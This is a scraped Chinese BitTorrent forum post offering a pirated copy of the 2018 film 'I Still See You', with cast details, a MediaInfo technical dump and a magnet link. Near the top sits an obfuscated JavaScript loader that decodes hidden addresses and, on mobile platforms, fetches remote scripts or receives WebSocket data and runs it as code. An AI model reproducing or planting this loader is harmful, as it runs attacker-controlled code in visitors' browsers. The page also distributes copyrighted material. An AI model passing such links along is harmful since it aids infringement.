千次伤我心[双语字幕]I.Still.See.You.2018.1080p.BluRay.x264.DTS-迅雷下载 8.40GB

版主小s 2月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 千次伤我心/Break My Heart 1000 Times/灵渡凶间(港)/阴魂未散(台)

◎片 名 I Still See You

◎年 代 2018

◎产 地 美国

◎类 别 惊悚 / 奇幻

◎语 言 英语

◎上映日期 2018-10-12(美国)

◎豆瓣评分 6.5/10 from 1851 users

◎豆瓣链接 https://movie.douban.com/subject/26377050/

◎片 长 98分钟

◎导 演 斯科特·斯皮尔 Scott Speer

◎编 剧 贾森·福克斯 Jason Fuchs / 丹尼尔·沃特斯 Daniel Waters

◎主 演 贝拉·索恩 Bella Thorne

理查德·哈蒙 Richard Harmon

德蒙特·莫罗尼 Dermot Mulroney

艾米·普赖斯-弗朗西斯 Amy Price-Francis

肖恩·本森 Shaun Benson

路易斯·赫特哈姆 Louis Herthum

托马斯·埃尔姆斯 Thomas Elms

萨拉·汤普森 Sara Thompson

休·狄伦 Hugh Dillon

玛丽娜·斯蒂芬森·科尔 Marina Stephenson Kerr

达西·菲尔 Darcy Fehr

摩根·霍姆斯特姆 Morgan Holmstrom

查德·布鲁斯 Chad Bruce

克里斯·西格森 Chris Sigurdson

艾丽西亚·约翰斯顿 Alicia Johnston

加斯·梅尔克利 Garth Merkeley

辛蒂·迈斯科 Cindy Myskiw

丹尼卡·弗雷德里克 Danika Frederick

卡桑德拉·波滕扎 Cassandra Potenza

◎标 签 惊悚 | 科幻 | 悬疑 | 美国 | 恐怖 | 2018 | 奇幻 | 温情

◎简 介

德蒙特·莫罗尼、理查德·哈蒙加盟惊悚片[千次伤我心]。该片根据丹尼尔·沃特斯的同名小说改编。斯科特·斯皮尔([舞出我人生4])执导,贾森·福克斯编剧,贝拉·索恩主演。该片设定于洪水劫难之后,鬼怪族群“残渣”出现。多年后,这些族群恐吓年轻女子(索恩饰),而她必须冒险找到生存之路。

  1. General

  2. Unique ID : 243654670174309016839788708054835017001 (0xB74E2EBACCEEDADDA81D6FFC17AA3529)

  3. Complete name : I.Still.See.You.2018.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.39 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate : 12.2 Mb/s

  9. Movie name : I Still See You 2018

  10. Encoded date : UTC 2021-06-29 04:19:54

  11. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Cover : Yes

  14. Attachments : cover.jpg


  15. Video

  16. ID : 1

  17. Format : AVC

  18. Format/Info : Advanced Video Codec

  19. Format profile : [email protected]

  20. Format settings : CABAC / 4 Ref Frames

  21. Format settings, CABAC : Yes

  22. Format settings, Reference frames : 4 frames

  23. Codec ID : V_MPEG4/ISO/AVC

  24. Duration : 1 h 38 min

  25. Bit rate : 10.7 Mb/s

  26. Width : 1 920 pixels

  27. Height : 804 pixels

  28. Display aspect ratio : 2.40:1

  29. Frame rate mode : Constant

  30. Frame rate : 23.976 (24000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.288

  36. Stream size : 7.31 GiB (87%)

  37. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  38. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=16.0000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.85 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  39. Language : English

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. ID in the original source medium : 4352 (0x1100)

  45. Format : DTS

  46. Format/Info : Digital Theater Systems

  47. Codec ID : A_DTS

  48. Duration : 1 h 38 min

  49. Bit rate mode : Constant

  50. Bit rate : 1 509 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossy

  57. Stream size : 1.04 GiB (12%)

  58. Language : English

  59. Default : Yes

  60. Forced : No

  61. Original source medium : Blu-ray


  62. Text #1

  63. ID : 3

  64. ID in the original source medium : 4610 (0x1202)

  65. Format : PGS

  66. Muxing mode : zlib

  67. Codec ID : S_HDMV/PGS

  68. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  69. Duration : 1 h 33 min

  70. Bit rate : 39.1 kb/s

  71. Count of elements : 1854

  72. Stream size : 26.3 MiB (0%)

  73. Title : chs&eng

  74. Language : Chinese

  75. Default : Yes

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #2

  79. ID : 4

  80. ID in the original source medium : 4611 (0x1203)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 33 min

  86. Bit rate : 39.4 kb/s

  87. Count of elements : 1854

  88. Stream size : 26.5 MiB (0%)

  89. Title : cht&eng

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #3

  95. ID : 5

  96. ID in the original source medium : 4612 (0x1204)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 33 min

  102. Bit rate : 22.7 kb/s

  103. Count of elements : 1854

  104. Stream size : 15.2 MiB (0%)

  105. Title : chs

  106. Language : Chinese

  107. Default : Yes

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #4

  111. ID : 6

  112. ID in the original source medium : 4613 (0x1205)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 33 min

  118. Bit rate : 23.0 kb/s

  119. Count of elements : 1854

  120. Stream size : 15.4 MiB (0%)

  121. Title : cht

  122. Language : Chinese

  123. Default : Yes

  124. Forced : No

  125. Original source medium : Blu-ray


  126. Text #5

  127. ID : 7

  128. ID in the original source medium : 4608 (0x1200)

  129. Format : PGS

  130. Muxing mode : zlib

  131. Codec ID : S_HDMV/PGS

  132. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  133. Duration : 1 h 34 min

  134. Bit rate : 31.8 kb/s

  135. Count of elements : 2166

  136. Stream size : 21.5 MiB (0%)

  137. Language : English

  138. Default : Yes

  139. Forced : No

  140. Original source medium : Blu-ray


  141. Menu

  142. 00:00:00.000 : Chapter 01

  143. 00:05:19.694 : Chapter 02

  144. 00:11:20.137 : Chapter 03

  145. 00:18:19.681 : Chapter 04

  146. 00:23:20.690 : Chapter 05

  147. 00:29:36.816 : Chapter 06

  148. 00:35:12.151 : Chapter 07

  149. 00:43:29.023 : Chapter 08

  150. 00:48:11.930 : Chapter 09

  151. 00:55:16.730 : Chapter 10

  152. 01:01:09.791 : Chapter 11

  153. 01:08:04.121 : Chapter 12

  154. 01:12:41.940 : Chapter 13

  155. 01:19:13.790 : Chapter 14

  156. 01:23:08.817 : Chapter 15

  157. 01:30:47.108 : Chapter 16


TAGS 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:9EFD5492F93ED54F5B2899812A0F204C819BF2B9
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖